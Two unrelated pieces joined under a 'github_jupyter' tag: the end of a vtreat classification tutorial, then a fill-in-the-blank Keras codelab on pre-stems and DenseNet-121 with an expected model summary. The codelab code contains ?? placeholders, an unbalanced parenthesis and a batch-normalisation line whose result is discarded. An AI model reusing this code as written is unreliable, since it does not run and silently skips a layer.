The `recommended` column indicates which variables are non constant (`has_range` == True) and have a significance value smaller than `default_threshold`. See the section *Deriving the Default Thresholds* below for the reasoning behind the default thresholds. Recommended columns are intended as advice about which variables appear to be most likely to be useful in a downstream model. This advice attempts to be conservative, to reduce the possibility of mistakenly eliminating variables that may in fact be useful (although, obviously, it can still mistakenly eliminate variables that have a real but non-linear relationship to the output, as is the case with `x`, in our example).
Let's look at the variables that are and are not recommended:
```
# recommended variables
transform.score_frame_.loc[transform.score_frame_['recommended'], ['variable']]
# not recommended variables
transform.score_frame_.loc[~transform.score_frame_['recommended'], ['variable']]
```
Notice that `d_prepared` only includes recommended variables (along with `y` and `yc`):
```
d_prepared.head()
```
This is `vtreat`s default behavior; to include all variables in the prepared data, set the parameter `filter_to_recommended` to False, as we show later, in the *Parameters for `BinomialOutcomeTreatment`* section below.
## A Closer Look at `logit_code` variables
Variables of type `logit_code` are the outputs of a one-variable hierarchical logistic regression of a categorical variable (in our example, `xc`) against the centered output on the (cross-validated) treated training data.
Let's see whether `xc_logit_code` makes a good one-variable model for `yc`. It has a large AUC:
```
wvpy.util.plot_roc(prediction=d_prepared['xc_logit_code'],
istrue=d_prepared['yc'],
title = 'performance of xc_logit_code variable')
```
This indicates that `xc_logit_code` is strongly predictive of the outcome. Negative values of `xc_logit_code` correspond strongly to negative outcomes, and positive values correspond strongly to positive outcomes.
```
wvpy.util.dual_density_plot(probs=d_prepared['xc_logit_code'],
istrue=d_prepared['yc'])
```
The values of `xc_logit_code` are in "link space". We can often visualize the relationship a little better by converting the logistic score to a probability.
```
from scipy.special import expit # sigmoid
from scipy.special import logit
offset = logit(numpy.mean(d_prepared.yc))
wvpy.util.dual_density_plot(probs=expit(d_prepared['xc_logit_code'] + offset),
istrue=d_prepared['yc'])
```
Variables of type `logit_code` are useful when dealing with categorical variables with a very large number of possible levels. For example, a categorical variable with 10,000 possible values potentially converts to 10,000 indicator variables, which may be unwieldy for some modeling methods. Using a single numerical variable of type `logit_code` may be a preferable alternative.
## Using the Prepared Data in a Model
Of course, what we really want to do with the prepared training data is to fit a model jointly with all the (recommended) variables.
Let's try fitting a logistic regression model to `d_prepared`.
```
import sklearn.linear_model
import seaborn
not_variables = ['y', 'yc', 'prediction']
model_vars = [v for v in d_prepared.columns if v not in set(not_variables)]
fitter = sklearn.linear_model.LogisticRegression()
fitter.fit(d_prepared[model_vars], d_prepared['yc'])
# now predict
d_prepared['prediction'] = fitter.predict_proba(d_prepared[model_vars])[:, 1]
# look at the ROC curve (on the training data)
wvpy.util.plot_roc(prediction=d_prepared['prediction'],
istrue=d_prepared['yc'],
title = 'Performance of logistic regression model on training data')
```
Now apply the model to new data.
```
# create the new data
dtest = make_data(450)
# prepare the new data with vtreat
dtest_prepared = transform.transform(dtest)
# apply the model to the prepared data
dtest_prepared['prediction'] = fitter.predict_proba(dtest_prepared[model_vars])[:, 1]
wvpy.util.plot_roc(prediction=dtest_prepared['prediction'],
istrue=dtest_prepared['yc'],
title = 'Performance of logistic regression model on test data')
```
## Parameters for `BinomialOutcomeTreatment`
We've tried to set the defaults for all parameters so that `vtreat` is usable out of the box for most applications.
```
vtreat.vtreat_parameters()
```
**use_hierarchical_estimate:**: When True, uses hierarchical smoothing when estimating `logit_code` variables; when False, uses unsmoothed logistic regression.
**coders**: The types of synthetic variables that `vtreat` will (potentially) produce. See *Types of prepared variables* below.
**filter_to_recommended**: When True, prepared data only includes variables marked as "recommended" in score frame. When False, prepared data includes all variables. See the Example below.
**indicator_min_fraction**: For categorical variables, indicator variables (type `indicator_code`) are only produced for levels that are present at least `indicator_min_fraction` of the time. A consequence of this is that 1/`indicator_min_fraction` is the maximum number of indicators that will be produced for a given categorical variable. To make sure that *all* possible indicator variables are produced, set `indicator_min_fraction = 0`
**cross_validation_plan**: The cross validation method used by `vtreat`. Most people won't have to change this.
**cross_validation_k**: The number of folds to use for cross-validation
**user_transforms**: For passing in user-defined transforms for custom data preparation. Won't be needed in most situations, but see [here](https://github.com/WinVector/pyvtreat/blob/master/Examples/UserCoders/UserCoders.ipynb) for an example of applying a GAM transform to input variables.
**sparse_indicators**: When True, use a (Pandas) sparse representation for indicator variables. This representation is compatible with `sklearn`; however, it may not be compatible with other modeling packages. When False, use a dense representation.
**missingness_imputation** The function or value that `vtreat` uses to impute or "fill in" missing numerical values. The default is `numpy.mean()`. To change the imputation function or use different functions/values for different columns, see the [Imputation example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Imputation/Imputation.ipynb).
### Example: Use all variables to model, not just recommended
```
transform_all = vtreat.BinomialOutcomeTreatment(
outcome_name='yc', # outcome variable
outcome_target=True, # outcome of interest
cols_to_copy=['y'], # columns to "carry along" but not treat as input variables
params = vtreat.vtreat_parameters({
'filter_to_recommended': False
})
)
transform_all.fit_transform(d, d['yc']).columns
transform_all.score_frame_
```
Note that the prepared data produced by `fit_transform()` includes all the variables, including those that were not marked as "recommended".
## Types of prepared variables
**clean_copy**: Produced from numerical variables: a clean numerical variable with no `NaNs` or missing values
**indicator_code**: Produced from categorical variables, one for each (common) level: for each level of the variable, indicates if that level was "on"
**prevalence_code**: Produced from categorical variables: indicates how often each level of the variable was "on"
**logit_code**: Produced from categorical variables: score from a one-dimensional model of the centered output as a function of the variable
**missing_indicator**: Produced for both numerical and categorical variables: an indicator variable that marks when the original variable was missing or `NaN`
**deviation_code**: not used by `BinomialOutcomeTreatment`
**impact_code**: not used by `BinomialOutcomeTreatment`
### Example: Produce only a subset of variable types
In this example, suppose you only want to use indicators and continuous variables in your model;
in other words, you only want to use variables of types (`clean_copy`, `missing_indicator`, and `indicator_code`), and no `logit_code` or `prevalence_code` variables.
```
transform_thin = vtreat.BinomialOutcomeTreatment(
outcome_name='yc', # outcome variable
outcome_target=True, # outcome of interest
cols_to_copy=['y'], # columns to "carry along" but not treat as input variables
params = vtreat.vtreat_parameters({
'filter_to_recommended': False,
'coders': {'clean_copy',
'missing_indicator',
'indicator_code',
}
})
)
transform_thin.fit_transform(d, d['yc']).head()
transform_thin.score_frame_
```
## Deriving the Default Thresholds
While machine learning algorithms are generally tolerant to a reasonable number of irrelevant or noise variables, too many irrelevant variables can lead to serious overfit; see [this article](http://www.win-vector.com/blog/2014/02/bad-bayes-an-example-of-why-you-need-hold-out-testing/) for an extreme example, one we call "Bad Bayes". The default threshold is an attempt to eliminate obviously irrelevant variables early.
Imagine that you have a pure noise dataset, where none of the *n* inputs are related to the output. If you treat each variable as a one-variable model for the output, and look at the significances of each model, these significance-values will be uniformly distributed in the range [0:1]. You want to pick a weakest possible significance threshold that eliminates as many noise variables as possible. A moment's thought should convince you that a threshold of *1/n* allows only one variable through, in expectation.
This leads to the general-case heuristic that a significance threshold of *1/n* on your variables should allow only one irrelevant variable through, in expectation (along with all the relevant variables). Hence, *1/n* used to be our recommended threshold, when we developed the R version of `vtreat`.
We noticed, however, that this biases the filtering against numerical variables, since there are at most two derived variables (of types *clean_copy* and *missing_indicator* for every numerical variable in the original data. Categorical variables, on the other hand, are expanded to many derived variables: several indicators (one for every common level), plus a *logit_code* and a *prevalence_code*. So we now reweight the thresholds.
Suppose you have a (treated) data set with *ntreat* different types of `vtreat` variables (`clean_copy`, `indicator_code`, etc).
There are *nT* variables of type *T*. Then the default threshold for all the variables of type *T* is *1/(ntreat nT)*. This reweighting helps to reduce the bias against any particular type of variable. The heuristic is still that the set of recommended variables will allow at most one noise variable into the set of candidate variables.
As noted above, because `vtreat` estimates variable significances using linear methods by default, some variables with a non-linear relationship to the output may fail to pass the threshold. Setting the `filter_to_recommended` parameter to False will keep all derived variables in the treated frame, for the data scientist to filter (or not) as they will.
## Conclusion
In all cases (classification, regression, unsupervised, and multinomial classification) the intent is that `vtreat` transforms are essentially one liners.
The preparation commands are organized as follows:
* **Regression**: [`Python` regression example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Regression/Regression.md), [`R` regression example, fit/prepare interface](https://github.com/WinVector/vtreat/blob/master/Examples/Regression/Regression_FP.md), [`R` regression example, design/prepare/experiment interface](https://github.com/WinVector/vtreat/blob/master/Examples/Regression/Regression.md).
* **Classification**: [`Python` classification example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Classification/Classification.md), [`R` classification example, fit/prepare interface](https://github.com/WinVector/vtreat/blob/master/Examples/Classification/Classification_FP.md), [`R` classification example, design/prepare/experiment interface](https://github.com/WinVector/vtreat/blob/master/Examples/Classification/Classification.md).
* **Unsupervised tasks**: [`Python` unsupervised example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Unsupervised/Unsupervised.md), [`R` unsupervised example, fit/prepare interface](https://github.com/WinVector/vtreat/blob/master/Examples/Unsupervised/Unsupervised_FP.md), [`R` unsupervised example, design/prepare/experiment interface](https://github.com/WinVector/vtreat/blob/master/Examples/Unsupervised/Unsupervised.md).
* **Multinomial classification**: [`Python` multinomial classification example](https://github.com/WinVector/pyvtreat/blob/master/Examples/Multinomial/MultinomialExample.md), [`R` multinomial classification example, fit/prepare interface](https://github.com/WinVector/vtreat/blob/master/Examples/Multinomial/MultinomialExample_FP.md), [`R` multinomial classification example, design/prepare/experiment interface](https://github.com/WinVector/vtreat/blob/master/Examples/Multinomial/MultinomialExample.md).
Some `vtreat` common capabilities are documented here:
* **Score Frame** [score_frame_](https://github.com/WinVector/pyvtreat/blob/master/Examples/ScoreFrame/ScoreFrame.md), using the `score_frame_` information.
* **Cross Validation** [Customized Cross Plans](https://github.com/WinVector/pyvtreat/blob/master/Examples/CustomizedCrossPlan/CustomizedCrossPlan.md), controlling the cross validation plan.
These current revisions of the examples are designed to be small, yet complete. So as a set they have some overlap, but the user can rely mostly on a single example for a single task type.
|
github_jupyter
|
```
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
<a target="_blank" href="https://colab.research.google.com/github/GoogleCloudPlatform/keras-idiomatic-programmer/blob/master/workshops/Advanced_Convolutional_Neural_Networks/Idiomatic%20Programmer%20-%20handbook%201%20-%20Codelab%204.ipynb">
<img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# Idiomatic Programmer Code Labs
## Code Labs #4 - Get Familiar with Advanced CNN Designs
## Prerequistes:
1. Familiar with Python
2. Completed Handbook 1/Part 4: Advanced Convolutional Neural Networks
## Objectives:
1. Architecture Changes - Pre-stems
2. Dense connections across sublayers in DenseNet
3. Xception Redesigned Macro-Architecture for CNN
## Pre-Stems Groups for Handling Different Input Sizes
Let's create a pre-stem to handle an input size different than what the neural network was designed for.
We will use these approaches:
1. Calculate the difference in size between the expected input and the actual size of
the input (in our case we are assuming actual size less than expected size).
A. Expected = (230, 230, 3)
B. Actual = (224, 224, 3)
2. Pad the inputs to fit into the expected size.
You fill in the blanks (replace the ??), make sure it passes the Python interpreter, and then verify it's correctness with the summary output.
You will need to:
1. Set the padding of the image prior to the first convolution.
```
from keras import layers, Input
# Not the input shape expected by the stem (which is (230, 230, 3)
inputs = Input(shape=(224, 224, 3))
# Add a pre-stem and pad (224, 224, 3) to (230, 230, 3)
# HINT: Since the pad is on both sides (left/right, top/bottom) you want to divide the
# difference by two (half goes to the left, half goes to the right, etc)
inputs = layers.ZeroPadding2D(??)(inputs)
# This stem's expected shape is (230, 230, 3)
x = layers.Conv2D(64, (7, 7), strides=(2,2))(inputs)
X = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
```
## Verify that actual is padded to expected:
You should get the following output on the shape of the inputs and outputs
```
inputs (?, 230, 230, 3)
outputs (?, 112, 112, 64)
```
```
# this will output: (230, 230, 3)
print("inputs", inputs.shape)
# this will output: (?, 112, 112, 64)
print("outputs", x.shape)
```
## DenseNet as Function API
Let's create a DenseNet-121:
We will use these approaches:
1. Add a pre-stem step of padding by 1 pixel so a 230x230x3 input results in 7x7
feature maps at the global average (bottleneck) layer.
2. Use average pooling (subsamnpling) in transition blocks.
3. Accumulated feature maps through residual blocks by concatenting the input to the
output, and making that the new output.
4. Use compression to reduce feature map sizes between dense blocks.
You will need to:
1. Set the padding in the stem group.
2. Concatenate the input and output at each residual block.
3. Set the compression (reduction) of filters in the transition block.
4. Use average pooling in transition block.
```
from keras import layers, Input, Model
def stem(inputs):
""" The Stem Convolution Group
inputs : input tensor
"""
# First large convolution for abstract features for input 230 x 230 and output
# 112 x 112
x = layers.Conv2D(64, (7, 7), strides=2)(inputs)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Add padding so when downsampling we fit shape 56 x 56
# Hint: we want to pad one pixel all around.
x = layers.ZeroPadding2D(padding=(??, ??)(x)
x = layers.MaxPooling2D((3, 3), strides=2)(x)
return x
def dense_block(x, nblocks, nb_filters):
""" Construct a Dense Block
x : input layer
nblocks : number of residual blocks in dense block
nb_filters: number of filters in convolution layer in residual block
"""
# Construct a group of residual blocks
for _ in range(nblocks):
x = residual_block(x, nb_filters)
return x
def residual_block(x, nb_filters):
""" Construct Residual Block
x : input layer
nb_filters: number of filters in convolution layer in residual block
"""
shortcut = x # remember input tensor into residual block
# Bottleneck convolution, expand filters by 4 (DenseNet-B)
x = layers.Conv2D(4 * nb_filters, (1, 1), strides=(1, 1))(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# 3 x 3 convolution with padding=same to preserve same shape of feature maps
x = layers.Conv2D(nb_filters, (3, 3), strides=(1, 1), padding='same')(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Concatenate the input (identity) with the output of the residual block
# Concatenation (vs. merging) provides Feature Reuse between layers
# HINT: Use a list which includes the remembered input and the output from the residual block - which becomes the new output
x = layers.concatenate([??])
return x
def trans_block(x, reduce_by):
""" Construct a Transition Block
x : input layer
reduce_by: percentage of reduction of feature maps
"""
# Reduce (compression) the number of feature maps (DenseNet-C)
# shape[n] returns a class object. We use int() to cast it into the dimension
# size
# HINT: the compression is a percentage (~0.5) that was passed as a parameter to this function
nb_filters = int( int(x.shape[3]) * ?? )
# Bottleneck convolution
x = layers.Conv2D(nb_filters, (1, 1), strides=(1, 1))(x)
x = layers.BatchNormalization()(x)
x = layers.ReLU()(x)
# Use mean value (average) instead of max value sampling when pooling
# reduce by 75%
# HINT: instead of Max Pooling (downsampling) we use Average Pooling (subsampling)
x = layers.??Pooling2D((2, 2), strides=(2, 2))(x)
return x
inputs = Input(shape=(230, 230, 3))
# Create the Stem Convolution Group
x = stem(inputs)
# number of residual blocks in each dense block
blocks = [6, 12, 24, 16]
# pop off the list the last dense block
last = blocks.pop()
# amount to reduce feature maps by (compression) during transition blocks
reduce_by = 0.5
# number of filters in a convolution block within a residual block
nb_filters = 32
# Create the dense blocks and interceding transition blocks
for nblocks in blocks:
x = dense_block(x, nblocks, nb_filters)
x = trans_block(x, reduce_by)
# Add the last dense block w/o a following transition block
x = dense_block(x, last, nb_filters)
# Classifier
# Global Average Pooling will flatten the 7x7 feature maps into 1D feature maps
x = layers.GlobalAveragePooling2D()(x)
# Fully connected output layer (classification)
outputs = x = layers.Dense(1000, activation='softmax')(x)
model = Model(inputs, outputs)
```
### Verify the model architecture using summary method
It should look like below:
```
Layer (type) Output Shape Param # Connected to
==================================================================================================
input_3 (InputLayer) (None, 230, 230, 3) 0
__________________________________________________________________________________________________
conv2d_241 (Conv2D) (None, 112, 112, 64) 9472 input_3[0][0]
__________________________________________________________________________________________________
batch_normalization_241 (BatchN (None, 112, 112, 64) 256 conv2d_241[0][0]
__________________________________________________________________________________________________
re_lu_241 (ReLU) (None, 112, 112, 64) 0 batch_normalization_241[0][0]
__________________________________________________________________________________________________
zero_padding2d_2 (ZeroPadding2D (None, 114, 114, 64) 0 re_lu_241[0][0]
__________________________________________________________________________________________________
max_pooling2d_3 (MaxPooling2D) (None, 56, 56, 64) 0 zero_padding2d_2[0][0]
__________________________________________________________________________________________________
conv2d_242 (Conv2D) (None, 56, 56, 128) 8320 max_pooling2d_3[0][0]
__________________________________________________________________________________________________
batch_normalization_242 (BatchN (None, 56, 56, 128) 512 conv2d_242[0][0]
__________________________________________________________________________________________________
re_lu_242 (ReLU) (None, 56, 56, 128) 0 batch_normalization_242[0][0]
__________________________________________________________________________________________________
conv2d_243 (Conv2D) (None, 56, 56, 32) 36896 re_lu_242[0][0]
__________________________________________________________________________________________________
batch_normalization_243 (BatchN (None, 56, 56, 32) 128 conv2d_243[0][0]
__________________________________________________________________________________________________
re_lu_243 (ReLU) (None, 56, 56, 32) 0 batch_normalization_243[0][0]
__________________________________________________________________________________________________
concatenate_117 (Concatenate) (None, 56, 56, 96) 0 max_pooling2d_3[0][0]
re_lu_243[0][0]
__________________________________________________________________________________________________
conv2d_244 (Conv2D) (None, 56, 56, 128) 12416 concatenate_117[0][0]
__________________________________________________________________________________________________
batch_normalization_244 (BatchN (None, 56, 56, 128) 512 conv2d_244[0][0]
__________________________________________________________________________________________________
re_lu_244 (ReLU) (None, 56, 56, 128) 0 batch_normalization_244[0][0]
__________________________________________________________________________________________________
conv2d_245 (Conv2D) (None, 56, 56, 32) 36896 re_lu_244[0][0]
__________________________________________________________________________________________________
batch_normalization_245 (BatchN (None, 56, 56, 32) 128 conv2d_245[0][0]
__________________________________________________________________________________________________
re_lu_245 (ReLU) (None, 56, 56, 32) 0 batch_normalization_245[0][0]
__________________________________________________________________________________________________
concatenate_118 (Concatenate) (None, 56, 56, 128) 0 concatenate_117[0][0]
re_lu_245[0][0]
__________________________________________________________________________________________________
conv2d_246 (Conv2D) (None, 56, 56, 128) 16512 concatenate_118[0][0]
__________________________________________________________________________________________________
batch_normalization_246 (BatchN (None, 56, 56, 128) 512 conv2d_246[0][0]
__________________________________________________________________________________________________
re_lu_246 (ReLU) (None, 56, 56, 128) 0 batch_normalization_246[0][0]
__________________________________________________________________________________________________
conv2d_247 (Conv2D) (None, 56, 56, 32) 36896 re_lu_246[0][0]
__________________________________________________________________________________________________
batch_normalization_247 (BatchN (None, 56, 56, 32) 128 conv2d_247[0][0]
__________________________________________________________________________________________________
re_lu_247 (ReLU) (None, 56, 56, 32) 0 batch_normalization_247[0][0]
__________________________________________________________________________________________________
concatenate_119 (Concatenate) (None, 56, 56, 160) 0 concatenate_118[0][0]
re_lu_247[0][0]
__________________________________________________________________________________________________
conv2d_248 (Conv2D) (None, 56, 56, 128) 20608 concatenate_119[0][0]
__________________________________________________________________________________________________
batch_normalization_248 (BatchN (None, 56, 56, 128) 512 conv2d_248[0][0]
__________________________________________________________________________________________________
re_lu_248 (ReLU) (None, 56, 56, 128) 0 batch_normalization_248[0][0]
__________________________________________________________________________________________________
conv2d_249 (Conv2D) (None, 56, 56, 32) 36896 re_lu_248[0][0]
__________________________________________________________________________________________________
batch_normalization_249 (BatchN (None, 56, 56, 32) 128 conv2d_249[0][0]
__________________________________________________________________________________________________
re_lu_249 (ReLU) (None, 56, 56, 32) 0 batch_normalization_249[0][0]
__________________________________________________________________________________________________
concatenate_120 (Concatenate) (None, 56, 56, 192) 0 concatenate_119[0][0]
re_lu_249[0][0]
__________________________________________________________________________________________________
conv2d_250 (Conv2D) (None, 56, 56, 128) 24704 concatenate_120[0][0]
__________________________________________________________________________________________________
batch_normalization_250 (BatchN (None, 56, 56, 128) 512 conv2d_250[0][0]
__________________________________________________________________________________________________
re_lu_250 (ReLU) (None, 56, 56, 128) 0 batch_normalization_250[0][0]
__________________________________________________________________________________________________
conv2d_251 (Conv2D) (None, 56, 56, 32) 36896 re_lu_250[0][0]
__________________________________________________________________________________________________
batch_normalization_251 (BatchN (None, 56, 56, 32) 128 conv2d_251[0][0]
__________________________________________________________________________________________________
re_lu_251 (ReLU) (None, 56, 56, 32) 0 batch_normalization_251[0][0]
__________________________________________________________________________________________________
concatenate_121 (Concatenate) (None, 56, 56, 224) 0 concatenate_120[0][0]
re_lu_251[0][0]
__________________________________________________________________________________________________
conv2d_252 (Conv2D) (None, 56, 56, 128) 28800 concatenate_121[0][0]
__________________________________________________________________________________________________
batch_normalization_252 (BatchN (None, 56, 56, 128) 512 conv2d_252[0][0]
__________________________________________________________________________________________________
re_lu_252 (ReLU) (None, 56, 56, 128) 0 batch_normalization_252[0][0]
__________________________________________________________________________________________________
conv2d_253 (Conv2D) (None, 56, 56, 32) 36896 re_lu_252[0][0]
__________________________________________________________________________________________________
batch_normalization_253 (BatchN (None, 56, 56, 32) 128 conv2d_253[0][0]
__________________________________________________________________________________________________
re_lu_253 (ReLU) (None, 56, 56, 32) 0 batch_normalization_253[0][0]
__________________________________________________________________________________________________
concatenate_122 (Concatenate) (None, 56, 56, 256) 0 concatenate_121[0][0]
re_lu_253[0][0]
__________________________________________________________________________________________________
conv2d_254 (Conv2D) (None, 56, 56, 128) 32896 concatenate_122[0][0]
__________________________________________________________________________________________________
batch_normalization_254 (BatchN (None, 56, 56, 128) 512 conv2d_254[0][0]
__________________________________________________________________________________________________
re_lu_254 (ReLU) (None, 56, 56, 128) 0 batch_normalization_254[0][0]
REMOVED for BREVITY ...
__________________________________________________________________________________________________
average_pooling2d_9 (AveragePoo (None, 7, 7, 512) 0 re_lu_328[0][0]
__________________________________________________________________________________________________
conv2d_329 (Conv2D) (None, 7, 7, 128) 65664 average_pooling2d_9[0][0]
__________________________________________________________________________________________________
batch_normalization_329 (BatchN (None, 7, 7, 128) 512 conv2d_329[0][0]
__________________________________________________________________________________________________
re_lu_329 (ReLU) (None, 7, 7, 128) 0 batch_normalization_329[0][0]
__________________________________________________________________________________________________
conv2d_330 (Conv2D) (None, 7, 7, 32) 36896 re_lu_329[0][0]
__________________________________________________________________________________________________
batch_normalization_330 (BatchN (None, 7, 7, 32) 128 conv2d_330[0][0]
__________________________________________________________________________________________________
re_lu_330 (ReLU) (None, 7, 7, 32) 0 batch_normalization_330[0][0]
__________________________________________________________________________________________________
concatenate_159 (Concatenate) (None, 7, 7, 544) 0 average_pooling2d_9[0][0]
re_lu_330[0][0]
__________________________________________________________________________________________________
conv2d_331 (Conv2D) (None, 7, 7, 128) 69760 concatenate_159[0][0]
__________________________________________________________________________________________________
batch_normalization_331 (BatchN (None, 7, 7, 128) 512 conv2d_331[0][0]
__________________________________________________________________________________________________
re_lu_331 (ReLU) (None, 7, 7, 128) 0 batch_normalization_331[0][0]
__________________________________________________________________________________________________
conv2d_332 (Conv2D) (None, 7, 7, 32) 36896 re_lu_331[0][0]
__________________________________________________________________________________________________
batch_normalization_332 (BatchN (None, 7, 7, 32) 128 conv2d_332[0][0]
__________________________________________________________________________________________________
re_lu_332 (ReLU) (None, 7, 7, 32) 0 batch_normalization_332[0][0]
__________________________________________________________________________________________________
concatenate_160 (Concatenate) (None, 7, 7, 576) 0 concatenate_159[0][0]
re_lu_332[0][0]
__________________________________________________________________________________________________
conv2d_333 (Conv2D) (None, 7, 7, 128) 73856 concatenate_160[0][0]
__________________________________________________________________________________________________
batch_normalization_333 (BatchN (None, 7, 7, 128) 512 conv2d_333[0][0]
__________________________________________________________________________________________________
re_lu_333 (ReLU) (None, 7, 7, 128) 0 batch_normalization_333[0][0]
__________________________________________________________________________________________________
conv2d_334 (Conv2D) (None, 7, 7, 32) 36896 re_lu_333[0][0]
__________________________________________________________________________________________________
batch_normalization_334 (BatchN (None, 7, 7, 32) 128 conv2d_334[0][0]
__________________________________________________________________________________________________
re_lu_334 (ReLU) (None, 7, 7, 32) 0 batch_normalization_334[0][0]
__________________________________________________________________________________________________
concatenate_161 (Concatenate) (None, 7, 7, 608) 0 concatenate_160[0][0]
re_lu_334[0][0]
__________________________________________________________________________________________________
conv2d_335 (Conv2D) (None, 7, 7, 128) 77952 concatenate_161[0][0]
__________________________________________________________________________________________________
batch_normalization_335 (BatchN (None, 7, 7, 128) 512 conv2d_335[0][0]
__________________________________________________________________________________________________
re_lu_335 (ReLU) (None, 7, 7, 128) 0 batch_normalization_335[0][0]
__________________________________________________________________________________________________
conv2d_336 (Conv2D) (None, 7, 7, 32) 36896 re_lu_335[0][0]
__________________________________________________________________________________________________
batch_normalization_336 (BatchN (None, 7, 7, 32) 128 conv2d_336[0][0]
__________________________________________________________________________________________________
re_lu_336 (ReLU) (None, 7, 7, 32) 0 batch_normalization_336[0][0]
__________________________________________________________________________________________________
concatenate_162 (Concatenate) (None, 7, 7, 640) 0 concatenate_161[0][0]
re_lu_336[0][0]
__________________________________________________________________________________________________
conv2d_337 (Conv2D) (None, 7, 7, 128) 82048 concatenate_162[0][0]
__________________________________________________________________________________________________
batch_normalization_337 (BatchN (None, 7, 7, 128) 512 conv2d_337[0][0]
__________________________________________________________________________________________________
re_lu_337 (ReLU) (None, 7, 7, 128) 0 batch_normalization_337[0][0]
__________________________________________________________________________________________________
conv2d_338 (Conv2D) (None, 7, 7, 32) 36896 re_lu_337[0][0]
__________________________________________________________________________________________________
batch_normalization_338 (BatchN (None, 7, 7, 32) 128 conv2d_338[0][0]
__________________________________________________________________________________________________
re_lu_338 (ReLU) (None, 7, 7, 32) 0 batch_normalization_338[0][0]
__________________________________________________________________________________________________
concatenate_163 (Concatenate) (None, 7, 7, 672) 0 concatenate_162[0][0]
re_lu_338[0][0]
__________________________________________________________________________________________________
conv2d_339 (Conv2D) (None, 7, 7, 128) 86144 concatenate_163[0][0]
__________________________________________________________________________________________________
batch_normalization_339 (BatchN (None, 7, 7, 128) 512 conv2d_339[0][0]
__________________________________________________________________________________________________
re_lu_339 (ReLU) (None, 7, 7, 128) 0 batch_normalization_339[0][0]
__________________________________________________________________________________________________
conv2d_340 (Conv2D) (None, 7, 7, 32) 36896 re_lu_339[0][0]
__________________________________________________________________________________________________
batch_normalization_340 (BatchN (None, 7, 7, 32) 128 conv2d_340[0][0]
__________________________________________________________________________________________________
re_lu_340 (ReLU) (None, 7, 7, 32) 0 batch_normalization_340[0][0]
__________________________________________________________________________________________________
concatenate_164 (Concatenate) (None, 7, 7, 704) 0 concatenate_163[0][0]
re_lu_340[0][0]
__________________________________________________________________________________________________
conv2d_341 (Conv2D) (None, 7, 7, 128) 90240 concatenate_164[0][0]
__________________________________________________________________________________________________
batch_normalization_341 (BatchN (None, 7, 7, 128) 512 conv2d_341[0][0]
__________________________________________________________________________________________________
re_lu_341 (ReLU) (None, 7, 7, 128) 0 batch_normalization_341[0][0]
__________________________________________________________________________________________________
conv2d_342 (Conv2D) (None, 7, 7, 32) 36896 re_lu_341[0][0]
__________________________________________________________________________________________________
batch_normalization_342 (BatchN (None, 7, 7, 32) 128 conv2d_342[0][0]
__________________________________________________________________________________________________
re_lu_342 (ReLU) (None, 7, 7, 32) 0 batch_normalization_342[0][0]
__________________________________________________________________________________________________
concatenate_165 (Concatenate) (None, 7, 7, 736) 0 concatenate_164[0][0]
re_lu_342[0][0]
__________________________________________________________________________________________________
conv2d_343 (Conv2D) (None, 7, 7, 128) 94336 concatenate_165[0][0]
__________________________________________________________________________________________________
batch_normalization_343 (BatchN (None, 7, 7, 128) 512 conv2d_343[0][0]
__________________________________________________________________________________________________
re_lu_343 (ReLU) (None, 7, 7, 128) 0 batch_normalization_343[0][0]
__________________________________________________________________________________________________
conv2d_344 (Conv2D) (None, 7, 7, 32) 36896 re_lu_343[0][0]
__________________________________________________________________________________________________
batch_normalization_344 (BatchN (None, 7, 7, 32) 128 conv2d_344[0][0]
__________________________________________________________________________________________________
re_lu_344 (ReLU) (None, 7, 7, 32) 0 batch_normalization_344[0][0]
__________________________________________________________________________________________________
concatenate_166 (Concatenate) (None, 7, 7, 768) 0 concatenate_165[0][0]
re_lu_344[0][0]
__________________________________________________________________________________________________
conv2d_345 (Conv2D) (None, 7, 7, 128) 98432 concatenate_166[0][0]
__________________________________________________________________________________________________
batch_normalization_345 (BatchN (None, 7, 7, 128) 512 conv2d_345[0][0]
__________________________________________________________________________________________________
re_lu_345 (ReLU) (None, 7, 7, 128) 0 batch_normalization_345[0][0]
__________________________________________________________________________________________________
conv2d_346 (Conv2D) (None, 7, 7, 32) 36896 re_lu_345[0][0]
__________________________________________________________________________________________________
batch_normalization_346 (BatchN (None, 7, 7, 32) 128 conv2d_346[0][0]
__________________________________________________________________________________________________
re_lu_346 (ReLU) (None, 7, 7, 32) 0 batch_normalization_346[0][0]
__________________________________________________________________________________________________
concatenate_167 (Concatenate) (None, 7, 7, 800) 0 concatenate_166[0][0]
re_lu_346[0][0]
__________________________________________________________________________________________________
conv2d_347 (Conv2D) (None, 7, 7, 128) 102528 concatenate_167[0][0]
__________________________________________________________________________________________________
batch_normalization_347 (BatchN (None, 7, 7, 128) 512 conv2d_347[0][0]
__________________________________________________________________________________________________
re_lu_347 (ReLU) (None, 7, 7, 128) 0 batch_normalization_347[0][0]
__________________________________________________________________________________________________
conv2d_348 (Conv2D) (None, 7, 7, 32) 36896 re_lu_347[0][0]
__________________________________________________________________________________________________
batch_normalization_348 (BatchN (None, 7, 7, 32) 128 conv2d_348[0][0]
__________________________________________________________________________________________________
re_lu_348 (ReLU) (None, 7, 7, 32) 0 batch_normalization_348[0][0]
__________________________________________________________________________________________________
concatenate_168 (Concatenate) (None, 7, 7, 832) 0 concatenate_167[0][0]
re_lu_348[0][0]
__________________________________________________________________________________________________
conv2d_349 (Conv2D) (None, 7, 7, 128) 106624 concatenate_168[0][0]
__________________________________________________________________________________________________
batch_normalization_349 (BatchN (None, 7, 7, 128) 512 conv2d_349[0][0]
__________________________________________________________________________________________________
re_lu_349 (ReLU) (None, 7, 7, 128) 0 batch_normalization_349[0][0]
__________________________________________________________________________________________________
